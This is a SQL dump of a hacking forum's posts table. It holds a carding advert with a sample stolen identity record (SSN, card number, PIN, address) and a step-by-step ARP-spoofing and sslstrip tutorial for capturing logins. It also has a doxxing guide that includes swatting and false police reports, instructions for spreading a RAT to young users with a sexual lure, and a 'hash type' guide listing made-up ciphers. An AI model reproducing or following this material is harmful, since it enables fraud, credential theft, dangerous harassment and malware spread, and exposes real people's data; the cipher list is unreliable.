SELL MANY SHOPADMINS\r\n| Excellent Services | Great Products\r\n\r\nI can registrer for u, or i can pass to u others accounts i have already activate !\r\nI can registrer for u,just onething u pay for this!\r\n\r\nDemo fullz cc\r\nAccount Open In: MD\r\nOnline ID: rgunn1a\r\nATM or Check Card PIN: 001755\r\nPasscode: eg15\r\n---------------Credit/Debit Card and Other Accounts\r\nDetails------------\r\nCC Number: 4888936039374958\r\nExp Date: 05/2010\r\nCvv: 545\r\nCC PinNumber: eg15\r\nAccount Number: 052001633\r\nRouting Number: 446010365904\r\n---------------Credit/Debit Card ---------------\r\nFull Name: bob gunn\r\nAddress Line 1: 808 lowe rd\r\nAddress Line 2:\r\nCity: middle river\r\nState: MD\r\nZipcode: 21220\r\nPhone Number:\r\nE-mail: rg.gunn\r\n---------------Identification---------------------\r\nSSN: 216-60-8382\r\nDOB: 04-04-1953\r\nMMN: pinkney\r\nDriver\'s Liecence No: g50076753097\r\n\r\nI have : us bins: 517805,488893,542432\r\nuk bins: 4547,5506,5569,5404,5031,4921,5505,5506,4921,4550\r\nger bins: 492942,490762,530127\r\naus bins: 543568,450605,494053,450606,456475,521893,519163\r\nand others bins for others country.....\r\n\r\n+ I can check balance in cvv, balance will be as good as you expect\r\nand price follow of agreements .\r\n\r\n+ All my cvv are tested before sell, that\'s sure.\r\n\r\n(I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT)\r\n.............................................................................\r\n\r\nI ACCEPT ONLY: WESTERN UNION - MONEY GRAM - LIBERTY RESERVE - UKASH\r\n\r\nI ALSO SELL IN BULK\r\nYOU CAN CONTACT ME IF YOU WANT TO BUY BULK FOR YOUR SHOP ADMINS.\r\nREAD MY THREAD WELL BEFORE YOU ADD ME\r\nIF YOU ASK FOR TEST I WONT GIVE YOU AND SAMPLE.\r\n\r\nY:m:Codeshopcc @yahoo.com\r\nY:d: Codeshopcc\r\nIcq: 643549928\r\nTHANKS TO YOU ALL.CONTACT ME FOR GOOD BUSINESS', '172.129.54.247', '-1400817929', '0', '0', '0', '0', '1', '7002e923190500f3c8d9b82be4a6a1f0', '0', '0'); INSERT INTO mybb_posts VALUES('164', '49', '126', '21', 'RE: Pandora DDOS Bot [Direct Link]', '0', '26', 'bixlow803', '1343988182', 'Idint try this body but how it works? Pls kindly give tutorials about this.\nIs there need the ip and the site url?', '203.177.42.214', '-877581610', '0', '0', '0', '0', '1', 'b59c82a764d72c9b92f0a23010da3835', '0', '0'); INSERT INTO mybb_posts VALUES('165', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '26', 'bixlow803', '1343988919', 'Nice budy but hot it works, kindly give 2torials', '203.177.42.214', '-877581610', '0', '0', '0', '0', '1', '3644cd6cda47cb79931db123df890b64', '0', '0'); INSERT INTO mybb_posts VALUES('166', '67', '160', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '1', 't3h jok3r', '1344003201', 'This thread has been junked.', '41.174.3.50', '699269938', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('167', '69', '162', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '1', 't3h jok3r', '1344003241', 'This thread has been junked.', '41.174.3.50', '699269938', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('168', '70', '163', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '1', 't3h jok3r', '1344003257', 'This thread has been junked.', '41.174.3.50', '699269938', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('169', '68', '161', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '1', 't3h jok3r', '1344003305', 'This thread has been junked.', '41.174.3.50', '699269938', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('170', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '20', 'JakeUS', '1344008168', 'This is nice, it will help new Staff members.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'b622a8fb30743bb46b7cdc1e7b31d50e', '0', '0'); INSERT INTO mybb_posts VALUES('173', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '27', 'Hil', '1344027571', 'Well, i didn\'t need this at all. But i think it\'ll become handy for our new moderators.', '80.72.152.146', '1346934930', '0', '0', '0', '0', '1', '519ea47e9b6bf48bdbda1f6656d5d35a', '0', '0'); INSERT INTO mybb_posts VALUES('174', '73', '0', '12', '|TUT| How to get any Website Login Passwords with uses SSL Encryption', '0', '1', 't3h jok3r', '1344114388', '[align=center][size=x-large][b]|TUT| How to get any Login Passwords with SSL Encryption[/b][/size][/align]\r\n\r\nHey folks,\r\nin this tutorial you\'re going to learn how get any Logins with a SSL Encyryption. This is my first tutorial ever, so I try my best to explain everything in detail. But if u have any questions feel free to ask.\r\n\r\n[u][size=large][color=#FF0000][b][align=center]THIS TUT IS FOR EDUCATIONAL PURPOSES ONLY ! SO DON\'T TRY THIS AT ANY OTHER NETWORKS WHICH ISN\'T YOURS ! [/align][/b][/color][/size][/u]\r\n\r\n[u][b]WHAT U NEED FOR THIS TUTORIAL :[/b][/u]\r\n\r\n- 1. Backtrack 4 RC2 ( For those who don\'t know what it is : it is a Linux Distribution.) You can use VMWARE (PC/MAC) or Parallels (MAC). Or u can use BT as a LIVE CD. IMPORTANT : Backtrack is a legal Operating System, and u can download it free. Just Google for it.\r\n\r\n- 2. A internal / external WIFI card which is supported by BackTrack ( If u don\'t have any WIFI Card which is supported by BT, go and buy one Ebay for cheap. Normally every WIFI Card which has a Atheros or Realtek Chip should work.)\r\nBut u can check ur WIFI Card here if your card is SUPPORTED :oui: or NOT :non: HERE [url=http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#compatibility]Compatibility List[/url]\r\n\r\n- 3. A Network like your home network with some Computers connected to the Router or School Network if u don\'t have a another PC to test ( BUT ONLY FOR EDUCATIONAL PURPOSES ONLY )\r\n\r\n- 4. A slave ( another PC connected to your network )\r\n\r\n[u][b]HOW DOES IT WORK :[/b][/u]\r\n\r\nWell there is a few things your doing. One of the major part is that you are doing is a ARP Poisoning. ( NOW IT GETS REALLY CONFUSING :blink: , BUT I TRY TO KEEP IT SIMPLE ) With the ARP Poisoning you are manipulating the arp packages and rerouting every package to your PC. NOW to understand this method : You are saying the Router that you are the slave Pc and to the slave Pc you are saying that you are the Router. We call this method \" Man in the Middle Attack\".\r\nThe second part is to \"DECRYPT\" the SSL Encryption ( it\'s not a decryting at all ) with SSLSTRIP. Well what u doing is that you are filtering everything between the slave PC and the Router.\r\n\r\n[b][u]NOW LET\'S GET STARTED :[/u][/b]\r\n- First let\'s check if your WIFI Card is supported or not.\r\nOpen the Terminal ( it is the black Box in the Taskbar ) and type :\r\n\r\n[b]airmon-ng[/b]\r\n\r\n- Now you should see your WIFI Card. We need start up the WIFI Card. So type :\r\n\r\n[b]airmon-ng start [interface-name, in my case it\'s wlan0] wlan0[/b]\r\n\r\n[spoiler]\r\n[img]http://i.min.us/ilymfW.png[/img]\r\n[/spoiler]\r\n\r\n- Now we have to connect to our own Network. But this is a little bit complicated. Anyway let\'s face it. \r\n\r\nGo to the BT Icon ( It\'s the icon in left below corner, it\'s a dragon icon ) and click it. Now u see a Menu. Go to \"Internet\" => And choose the \"Wicd Network Manager\"\r\n\r\n[spoiler]\r\n[img]http://i.min.us/ijifuk.png[/img]\r\n[/spoiler]\r\n\r\n- It should open the WICD Manager. Now you should see your Wireless Network, if not just click on the \"Refresh\"-Button. The next Step is to connect to your network. If u have any WIFI Encryption ( which I highly recommend ), then u have to enter it. Just click on the \"Properties\"-Button next to the \"Connect\"-Button.\r\nChoose your encryption and enter the password. If u have successfully connected to the network, just minimize the window. [b](DON\'T CLOSE IT !)[/b]\r\n\r\n[spoiler]\r\n[img]http://i.min.us/ijh0PI.png[/img]\r\n[/spoiler]\r\n\r\nOKAY, now we have to set up everything for SSLSTRIP. Go to the terminal and type following command :\r\n\r\n[b]kate /etc/etter.conf[/b]\r\n\r\n- We have edit this config file. Scroll down to the \"Linux\" Section.\r\nUncomment (= remove the \"#\" ) before \"redir_command_on\" and \"redir_command_off\" . Just click save and close the editor. \r\n\r\n[spoiler]\r\n[img]http://i.min.us/ijh2XQ.png[/img] \r\n[/spoiler]\r\n\r\n- Open a new up a Terminal and type the following command :\r\n\r\n[b]echo 1 > /proc/sys/net/ipv4/ip_forward[/b]\r\n\r\n- Now type :\r\n\r\n[b]arpspoof -i (your device name, in my case it\'s wlan0 )wlan0 -t (the specific slave\'s ip) 192.168.1.6 (and ip od the router )192.168.1.1[/b]\r\n\r\n[b]arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1[/b]\r\n\r\n-BUT if u like to poison the whole network just type :\r\n\r\n[b]arpspoof -i wlan0 (ip of the router) 192.168.1.1[/b]\r\n\r\n[b]arpspoof -i wlan0 192.168.1.1[/b]\r\n\r\n- Open another Terminal and type :\r\n\r\n[b]iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000[/b]\r\n\r\n-Then in the same Terminal window :\r\n\r\n[b]ettercap -T -q -i wlan0 [/b]\r\n\r\n-Finally open a new Terminal and type :\r\n\r\n[b]sslstrip -a -k -f[/b]\r\n\r\n-AND FINALLY OPEN THE FINAL AND LAST TERMINAL AND TYPE:\r\n[b]ettercap -T -q -i wlan0[/b]\r\n\r\nNOW you are ready to go, let the slave login to any site with ssl. Grap a Coffee and wait. Here are some demonstration pics :\r\n\r\n[spoiler]\r\n[img]http://i.min.us/ijmxMw.png[/img]\r\n[/spoiler]\r\n[spoiler]\r\n[img]http://i.min.us/ijibhY.png[/img]\r\n[/spoiler]', '41.174.24.14', '699275278', '1', '0', '1', '1344114684', '1', 'e461a67c848be5d8ce53d86b1e943554', '0', '1344114684'); INSERT INTO mybb_posts VALUES('175', '74', '0', '12', '? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '5', 'Timmy', '1344114849', 'Hey guys! I have been working a while on this! And I finally found a way to get free drinks out of vending machines, just by using the codes the programers and re-fillers use! \n\nYou can also download it at my website http://tackyshack.blogspot.com\n\nJUST GOTO MY WEBSITE PLEASE :D\n\nCredits: Sit hacks a lot\n\nPost # 7\nI don\'t have a direct link unfortunately because I don\'t run the blog.\n\nIf anyone has a problem, then feel free to report.', '41.174.24.14', '699275278', '1', '0', '1', '1345678708', '1', 'efc50f00e83fa5cc324f2a80ba692f54', '0', '1345678708'); INSERT INTO mybb_posts VALUES('176', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '5', 'Timmy', '1344114911', 'Good DDoSer but didn\'t you post this in the wrong section?', '41.174.24.14', '699275278', '1', '0', '0', '0', '1', 'cbbdf70776fa815f62b0aed01ef94a48', '0', '0'); INSERT INTO mybb_posts VALUES('177', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '26', 'bixlow803', '1344118953', 'Nice öne hope i enjoy it, by theway. What happen to l33thackers.Com is it down?', '203.177.42.214', '-877581610', '0', '0', '0', '0', '1', '0d8b04376624dbaae11622d4af4ef8a9', '0', '0'); INSERT INTO mybb_posts VALUES('178', '55', '139', '12', 'RE: [tut] SMS Bomber', '0', '8', 'spacefish36', '1344197719', 'Works like a charm. Thanks, just worried about the virus scan.', '41.174.54.91', '699283035', '0', '0', '0', '0', '1', '352c11b967b57dfa15041651498006b4', '0', '0'); INSERT INTO mybb_posts VALUES('179', '55', '139', '12', 'RE: [tut] SMS Bomber', '0', '9', 'p420', '1344197810', 'Don\'t worry, because it so-called hacks android phones to allow such a message through.', '41.174.54.91', '699283035', '0', '0', '0', '0', '1', '4ce8f62caaac3a78cbf067a9d19f7f60', '0', '0'); INSERT INTO mybb_posts VALUES('180', '73', '174', '12', 'RE: |TUT| How to get any Website Login Passwords with uses SSL Encryption', '0', '8', 'spacefish36', '1344197892', 'Thanks a bunch, I\'m going to download Backtrack and buy the needful stuff. This thing crazy, thanks.', '41.174.54.91', '699283035', '0', '0', '0', '0', '1', '4f73f7f095974cf70ef5f4dae1c9f81f', '0', '0'); INSERT INTO mybb_posts VALUES('181', '75', '0', '13', '~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '8', 'spacefish36', '1344198200', '[i]Hello guys. You want someone\'s IP? Use one of these methods ;)[/i]\n\n[color=#FF0000][b]Method 1: Syntaxmaster[/b][/color]\n[size=x-small]In my opinion, this is the best method for getting someone\'s IP.[/size]\n\n1) [b][color=#FFD700]Register at[/color] [color=#32CD32]syntaxmaster.info[/color] [color=#1E90FF](very easy!)[/color], [color=#FFD700]and go to[/color] [color=#32CD32]Software/Tools > IP Stealer.[/color][/b]\n2) [b][color=#FFD700]Put in a site you want your slave to be redirected to. This doesn\'t matter, you can just put anything.[/color][/b]\n3) [b][color=#FFD700]There should be a site somewhere. Copy that site, and make it shorter on sites like[/color] [color=#FF1493]goo.gl[/color] [color=#FFD700]and[/color] [color=#FF1493]bit.ly[/color][/b]\n4) [b][color=#C71585]Send the site to your slave. When he clicks on it, you\'ll get his IP on the same site as you got the link from.[/color][/b]\n\n[color=#32CD32][b]Method 2: Getting a mail from your slave.[/b][/color]\n[size=x-small]Not the best method, but it works.[/size]\n\n1) [b][color=#FF0000]Send your slave an email:[/color] [color=#FFD700]\'hi, how are you?\'[/color] [color=#FF0000]or something like that.[/color][/b]\n2) [b][color=#FF0000]If he sends a mail back, you\'re lucky.[/color] [color=#32CD32]Right Mouse Button > View Source,[/color] [color=#FF0000]his IP should be there.[/color][/b]\n\n[color=#FFD700][b]Method 3: IPGet (MSN+ Add-on)[/b][/color]\n\n\n[i]I never used this program before, so I can\'t tell you anything. I only know it\'s a good method for getting someone\'s IP.[/i]\n\n[url=http://www.msgplus.net/Downloads/][b][color=#FF1493]Click here for the MSN+ Download Link.[/color][/b][/url]\n\n[color=#FF0000][b]Method 4: Skype[/b][/color]\n[size=x-small]Not the easiest method, but it works[/size]\n\n1) [b][color=#00BFFF]Start a conversation with your slave. Text or Call, doesn\'t matter.[/color][/b]\n2) [b][color=#FF0000]Go to CMD, and type in netstat -nbt[/color][/b]\n3) [b][color=#FFD700]Then you should get his IP.[/color][/b]\n\nI hope this tutorial helped! Again, sorry for my bad English', '41.174.54.91', '699283035', '0', '0', '8', '1344198242', '1', '21d8b166f2221f711c2006b94d08abc6', '0', '1344198242'); INSERT INTO mybb_posts VALUES('182', '75', '181', '13', 'RE: ~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '1', 't3h jok3r', '1344198334', 'Nice theme and methods. Thanks for contributing.', '41.174.54.91', '699283035', '1', '0', '0', '0', '1', '4774874bd9c10070bec6b38beee25fc3', '0', '0'); INSERT INTO mybb_posts VALUES('183', '76', '0', '14', 'Hide-IP-Browser', '0', '12', 'jonas83', '1344198709', 'Just found this while surfing the net for some software. \r\n\r\n\r\n[img]http://i31.fastpic.ru/big/2012/0111/0c/9cd488e943d3e849485d9b9e088aaa0c.png[/img]\r\n\r\n\r\n\r\n\r\nHide-IP-Browser v2.0 | 2 Mb\r\n\r\nThe ultimate hide IP address software. Find out how to hide your IP address easily. Hiding your real IP address is the only technique that can help you protect your identity while browsing the web. By using Hide-IP-Browser you can surf any Web Site, Web-based Email services, Newsgroups, Web Blogs and Forums using a different IP address.\r\n\r\n\r\nHow it Works?\r\nHide-IP-Browser protects your identity by replacing your real IP address with a different one. You will appear to access the internet from a different location, not your own. Your real location is never revealed. We are using proxies from different countries to hide your IP address. A partial country list from where you can get a new IP address is this: United States, United Kingdom, Israel, Canada, Germany, Japan, Netherlands, and many more.\r\n\r\nHome: http://www.hide-ip-browser.com\r\n\r\n\r\nDownload\r\n[code]\r\nhttps://www.rapidshare.com/files/4290382747/X-20HIB.rar\r\n\r\nhttp://filepost.com/files/e21a5e83/X-20HIB.rar \r\n[/code]\r\n\r\n[b]Virus Scan[/b]\r\n[spoiler]\r\nFile Info\r\n\r\nReport date: 2012-01-11 18:29:28 (GMT 1)\r\nFile name: [b]hide-ip-browser-v2-0-crk-res-z[/b]\r\nFile size: 2219569 bytes\r\nMD5 Hash: 0f11b2a2094bfe868cc5b1b69eabf12f\r\nSHA1 Hash: 3ccd7f9f441556d1df3a42e782b453f18ff4f169\r\nDetection rate: [color=#FF0000]1[/color] on 9 (11%) \r\nStatus: [color=#FF0000]INFECTED READ THE DISCLAIMER BEFORE FLAMING ME![/color]\r\n\r\nDetections\r\n\r\nAvast - \r\nAVG - \r\nAvira AntiVir - \r\nClamAV - \r\nComodo - \r\nEmsisoft - \r\nF-Prot - W32/Internet-Trojan-patched-based!Maximus\r\nIkarus - \r\nTrendMicro - \r\n\r\nScan report generated by\r\nNoVirusThanks.org\r\n\r\n[/spoiler]\r\n\r\nIts just a false positive because of the patched file. If you are unsure or really a cautious person run it in a VM or Sandboxie etc.', '41.174.54.91', '699283035', '0', '0', '0', '0', '1', 'f61913aa44b2fe562e67441ece05b7ab', '0', '0'); INSERT INTO mybb_posts VALUES('184', '77', '0', '16', 'Disguise your voice over Skype', '0', '12', 'jonas83', '1344198838', 'If anybody needs a voicechanger for skype ,then here\'s a good one.\r\n\r\nhttp://clownfish-translator.com/download.html\r\n\r\nDownload and install, then go to the right bottom of your desktop , and you\'ll see a little clownfish. right click on it and select voice changer , then voices and select the voice u want. ( To test your voice select hear voice )\r\n\r\nThen go to skype, it should be something like \"clownfish.exe wants to use skype\" or something.\r\n\r\nAccept it and normally your voice should be changed.', '41.174.54.91', '699283035', '0', '0', '0', '0', '1', 'a3309500b9cd2132b3564aac1329c7e6', '0', '0'); INSERT INTO mybb_posts VALUES('185', '62', '148', '25', 'RE: [Guide]Firewalls', '0', '1', 't3h jok3r', '1344199034', 'Great, I feel safe now LOL. Nice guide, hopefully I\'m protected.', '41.174.54.91', '699283035', '1', '0', '0', '0', '1', 'f63d945b504476f3ae9db317729e49b7', '0', '0'); INSERT INTO mybb_posts VALUES('186', '2', '4', '34', 'RE: Userbar tut', '0', '1', 't3h jok3r', '1344199074', 'No problem, thanks for the comment though.', '41.174.54.91', '699283035', '1', '0', '0', '0', '1', '377526730436b139a244f5ddcc6d42aa', '0', '0'); INSERT INTO mybb_posts VALUES('187', '78', '0', '7', 'Dota 2 beta keys giveawat!', '0', '27', 'Hil', '1344282662', 'Hey guys,\r\n\r\nSteelseries and Valve are doing a big giveaway.. Here ya go:\r\nhttp://c.steelseries.com/dota2betakey?code=9PadFUpC\r\n\r\n\r\nPlease use my ref link! :D', '80.72.152.146', '1346934930', '0', '0', '0', '0', '1', 'a86bb991bf3c7b0c09649f5336694c3d', '0', '0'); INSERT INTO mybb_posts VALUES('188', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '1', 't3h jok3r', '1344285699', 'Awesome, seems like to be an awesome website.', '41.174.53.95', '699282783', '1', '0', '0', '0', '1', 'b195b69312f69d20e0eec170338146e4', '0', '0'); INSERT INTO mybb_posts VALUES('189', '79', '0', '29', '[tut]How to ruin somones life[DOX]', '0', '1', 't3h jok3r', '1344287048', 'Hello L33T Hacking,\n\nThis is a tutorial on how to ruin someone\'s life with a dox. Please use these tactics at your own risk.You must use a proxy when using these tactics, you may get caught so I recommend a proxy. Google \'\'Free Proxies\'\' or anonym.to , if you\'re in need of getting behind a proxy. Also, you\'ll need a dox on the person you\'re going to ruin.\n\nWhat is a Dox?\n\nPersonal information.\n\nHow do you dox?\n\nYou may want to use the search button part of the forum.\n\nNow lets begin.\n\nPizza Bombs:\n\nGet behind a proxy.\nGo to some pizzeria that allows delivering from the web like Dominos\n\nThe food is delivered to the target\'s place of residence, where they will have to deal with a delivery order from you.\n\nBox Floods:\nCreate an account on USPS\nGo to the USPS\'s Store and order all the free boxes or mailing envelopes.\nConfirm the street address and purchase them.\nThe maximize of ordering packs on a single account is 20.\n\nMeet up\'s\n\nThere\'s a website that allows you to plan parties and bunch of hippies go to the slave\'s house thinking that there is a party.\nThat is this.\n\nSending Mail in real life:\nGo to a post office, say you are moving, or you are new to the area and need to redirect your mail temporally. They will give you an envelope or postcard to fill out and drop in any mailbox. To the best I know, there is no checking done on the part of the USPS. A good tactic is to make the envelopes look official with the logos and such of your victims local council/government/tax office/police station.\n\nFree Tampons\n\nIf the slave likes tampons, why don\'t we send them some? These kind of deliveries are annoying to a lot of people.\nSend Free Tampons!\n\nCraiglist\nPost that \"you\" are having a garage sale. You are moving and everything needs to go out. You\'ll have an HDTV or Motorcycle there for $50, a stereo set for $100 and many other cheap ass high-end things. Steal pictures off the internet of \"your items\". Enter your slave\'s address, and choose a date over the weekend. On those days your slave will have strangers coming to his/she house constantly asking for cheap stuff. Sometimes even the POLICE gets involved. Why? Police track down thefts. If your slave is selling a bunch of high end merchandise, it\'s likely the police will check those out.\nCraiglist\n\nProstitutes\nGo to Craigslist .\nClick on the state where the slave is located at.\nGo to Services, and under that click Erotic.\nCall all the out call escorts-out call means that they come to you and make an appointment with the target.\nPolice Raid\nReport the slave or target as an anonymous tip for suspiciousness of selling drugs.\nPolice harassment will occur.\n\nRuining a Marriage:\nCollect information about a married man that you know. Get a girl to call his house. If the wife answers, hang up. Do this another time. On the third time, ask for the guy. This will cause lots of suspicion. Keep this up for a month and see his marriage ruined.\n\nPurchasing orders:\nTake an anonymous prepaid credit card\nBuy an anonymous VoIP fax service\nObtain a professional looking form from a print shop\nFax POs through tor\nMost companies will ship no questions asked after receiving a PO. Said companies will come after your target and sue them and ruin their credit, and they\'ll have fucking tons of shit that they don\'t know what to do with.\n\nSwatting:\nUsing skype or spoof card and calling the cops and saying theres a man with a gun in your house holding you and your family hostage. The swat breaks down your door, ties everyone up and talks to all of you and maybe brings you to the station. The police find out there wasnt a hostage situation and goes back to look at the call and thinks your from from england because thats where skype is located. Make shure you dont have any real info or a phone number on ure skype account.Credit goes to Hydro for this tactic.\n\nPolice Piracy Rape:\n\nReport the guy to the police saying that he is selling pirated software.\nPolice raid occurs\nConfiscated computer occurs', '41.174.54.150', '699283094', '1', '0', '1', '1352589728', '1', '1dd2a35ce4d1ca730d1340f7a5404894', '0', '1352589728'); INSERT INTO mybb_posts VALUES('190', '80', '0', '24', 'How WiFi Security Works', '0', '1', 't3h jok3r', '1344287527', '[u][b]How WiFi Security Works[/b][/u]\r\n\r\nwhen you use a WiFi network, you\'re an open book. The same technology that lets you browse the Web from your back porch can let invaders hop onto your network from outside your location.\r\n\r\nBy its nature, WiFi is open technology. A wireless router broadcasts its presence to any device with a WiFi adapter within its range, and if the router is unprotected, anyone who wants to can connect to it and use the network. That makes it easy to get in.\r\n\r\nA common invader is called a \'war driver\'. A war driver is a person or people who drive through areas known for having WiFi networks, they search for unprotected networks they can break into. They use software what makes it easy to find unprotected networks. Some use high powered antennas so that they can find as many networks as possible.But, they don\'t even need this kind of equipment to get into networks. Software built directly into Windows XP, for example, makes it easy for anyone to find and connect to an unprotected network as many of us know\r\n\r\nWhen war drivers target a business network, they may be looking for proprietary business information, or they may be looking to do some malicious damage. When they target a home network, they may be looking for personal information, such as credit cards, or they may be also looking to damage computers as well.\r\n\r\nWiFi intruders can cause other problems, these may be even more serious than stealing information or damaging computers. They can use this for illegal activitiesand if those activities are uncovered, it may look as if the owner of the network is guilty, because the war driver will be long gone.\r\n\r\nIntruders can use WiFi for other purposes as well, such as illegally downloading music and videos, or using the network to attack other networks.\r\n\r\nThere are a variety of ways to protect against these intruders, but one of the primary ways is to use encryption, a means of scrambling data so that only those with the proper encryption keys can read it. THOSE BASTARDS!!.\r\nEncryption can be used to keep anyone out of a network who doesn\'t have the proper key.\r\n\r\nThere are a variety of encryption standards, notably the WEP (Wired Encryption Protocol) and WPA (WiFi Protected Access). WEP is the older standard, and not as powerful as WPA, but for home networks it\'s usually adequate, because it can keep out all but the most dedicated intruders, and these rarely target home networks,uh not. WPA is more powerful, and is usually used in businesses,but can be used at home as well.\r\n\r\n[b][u]How WiFi Encryption Works[/u][/b]\r\n\r\nWPA encryption can be used in corporations or in home networks. When used in a corporation, a computer with a wireless adapter first makes a connection to a wireless AP( Access Point). In order to be let in the network, it needs to be authenticated using 802.11X authentication with a version of the Extensible Authentication Protocol( EAP). To be authenticated, the computer needs to send a password, an ID, or use some form of hardware based authentication, like comparing MAC (Media Access Control )addresses.\r\n\r\nThe AP passes the ID along to an authentication server. The server checks to make sure that the ID is valid.\r\n\r\nIf the ID is valid, the authentication server sends a master TKIP(Temporal Key Integrity Protocol.) \"key\" to both the computer and to the AP. \r\n\r\nThe key is installed on both the computer and the AP, and the computer can now get onto the network.\r\n\r\nWhen a computer tries to get onto the network or read any data passing across the network, and it doesn\'t have a valid key or its key has been rejected by the authentication server, it will not be allowed onto the network. All data sent across the network is encrypted using this key, and only those with the proper key can read it. So if someone snoops on data being sent across the network, they\'ll see only scrambled gibberish, and won\'t be able to steal information or data.\r\n\r\nIn a home network or small network, WPA can be used without an authentication server, although its not as secure as WAP using an authentication server. Om this case, a password is entered manually into each computer and AP on the network, and so only those devices will be able to use the network or read network data. Computers without the key will be rejected from the network and will not be able to read data.', '41.174.54.150', '699283094', '1', '0', '0', '0', '1', '91f7bfdef0b55610beb89e9fc4c6a10f', '0', '0'); INSERT INTO mybb_posts VALUES('191', '81', '0', '12', '[tut]How to spread your server', '0', '4', 'Triple H', '1344287709', '1. Upload your server on mediafire.com or somewhere else ( take a jpeg icon for your server )\r\n\r\n2. Goto \"[b]ask.fm[/b]\". It\'s a website where people can ask questions to registrated members (most of them are young girls )\r\non bottom of this site are some online members (after reloading the site, there are new ones)\r\n\r\n\r\n3. Spread your virus-link!\r\npost a question on their site which makes them wanna download your file. for example: \r\n\r\n\r\n\"[i][color=#FFFFFF]Arent you embarrassed that there are naked pictures of you to download rigth here? - DOWNLOADLINK -[/color][/i]\"\r\n\r\n\r\n4. Wait untill they connect \r\n\r\nIts not the best way to spread but its okay \r\nI make ~ 30/40 slaves in 10 minutes', '41.174.54.150', '699283094', '1', '0', '0', '0', '1', '934d270f9ca118568fd00df9821fb993', '0', '0'); INSERT INTO mybb_posts VALUES('192', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '4', 'Triple H', '1344287783', 'Nice blog, hopefully it works.', '41.174.54.150', '699283094', '1', '0', '0', '0', '1', '61926e980a56453e9a34bdb3bc84cdb3', '0', '0'); INSERT INTO mybb_posts VALUES('193', '82', '0', '13', '[guide]How to detect Hash Type', '0', '17', 'khade009', '1344287942', '[b]Base64[/b]\r\nEnds with ==\r\nExample [code]c21hc2hwdW1wa2lucw==[/code]\r\n\r\n[b]Megan-35[/b]\r\nLast digit is 5 \r\nExample [code]mwvXmwXqngvqkw1Vmq55[/code]\r\n\r\n[b]Feron-74[/b]\r\nLast digit is 4 \r\nExample [code]CmlxCmxisuliPmygCi44[/code]\r\n\r\n[b]AER-256[/b]\r\nStarts with 2\r\nSecond number isnt bigger than 6\r\nContains ,.\r\nExample: [code]2475686.270836455, 2412016.365752809, 33.673757802746564[/code]\r\n\r\n[b]Armon-64[/b]\r\nIn middle has + \r\nContains . . \r\nStarts with 2\r\nExample: [code]25448157090.709496+94249848.213684[/code]\r\n\r\n[b]ATOM-128[/b]\r\nUsually contains +\r\nStarts with letter\r\nMostly are letters\r\nUsually ends with CC\r\nExample: [code]nIhqLjQ5MiT6Ml63+/CC[/code]\r\n\r\n[b]ESAB-46[/b]\r\nEnds with //\r\nContains letters and numbers\r\nExample: [code]8mlR8mRg92lg3mVe8g//[/code]\r\n\r\n[b]EZIP-64[/b]\r\nHuge amount of numbers\r\nUsually contains ././\r\nStarts with 1\r\nExample: [code]15623.730897750893/14124.447874419286/15213.338713579566/-126.04199709670604[/code]\r\n\r\n[b]GILA7[/b]\r\nEnds with Letter \r\nStarts with G\r\nSometimes contains +,=\r\nExample [code]qrF1qr1538F5DrOmq5GG[/code]\r\n\r\n[b]OKTO3[/b]\r\nLists numbers\r\nExample: [code]748063693824791400\r\n747938510478572200\r\n761035954145620400\r\n696080542373685800\r\n-515497671532164.4[/code]\r\n\r\n[b]TIGO-3FX[/b]\r\nContains =\r\nSometimes ends with FXX\r\nExample: [code]7If9=8fpBltnBkHY[/code]\r\n\r\n[b]TRIPO-5[/b]\r\nEnds with TT\r\nContains /\r\nExample: [code]Vb9KdExM/zpMWwTT[/code]\r\n\r\n[b]ZARA-128[/b]\r\nLooks like this [code]427 421 409 427 416 424 429 421 424 419 417 422 427[/code]\r\n\r\n[b]ZONG22[/b]\r\nMostly ends with 2\r\nExample : [code]dfNbYvNhoop2[/code]\r\n\r\n[b]HAZZ-15[/b]\r\nEnds with 55\r\nStarts with q\r\nExample: [code]qmlGwujeD8JFDoFsEH55[/code]\r\n\r\nSite that you can encrypt/decrypt\r\n[code]www.crypo.com\r\nmd5decrypter.co.uk[/code]', '41.174.54.150', '699283094', '0', '0', '0', '0', '1', '591f6480eb3fc371dbc1acd95fb22093', '0', '0'); INSERT INTO mybb_posts VALUES('194', '28', '82', '3', 'RE: Buttons updated.', '0', '17', 'khade009', '1344287989', 'The new buttons are pretty cool.', '41.174.54.150', '699283094', '0', '0', '0', '0', '1', 'ac9d9634ada7d4c1ae3ecba808261776', '0', '0'); INSERT INTO mybb_posts VALUES('195', '14', '39', '8', 'RE: Work Hard Play Hard-Rap', '0', '17', 'khade009', '1344288046', 'I love the song too, well I use to. Now I like cashing out.', '41.174.54.150', '699283094', '0', '0', '0', '0', '1', '6fc54a9abff23f4557c515f8568593d7', 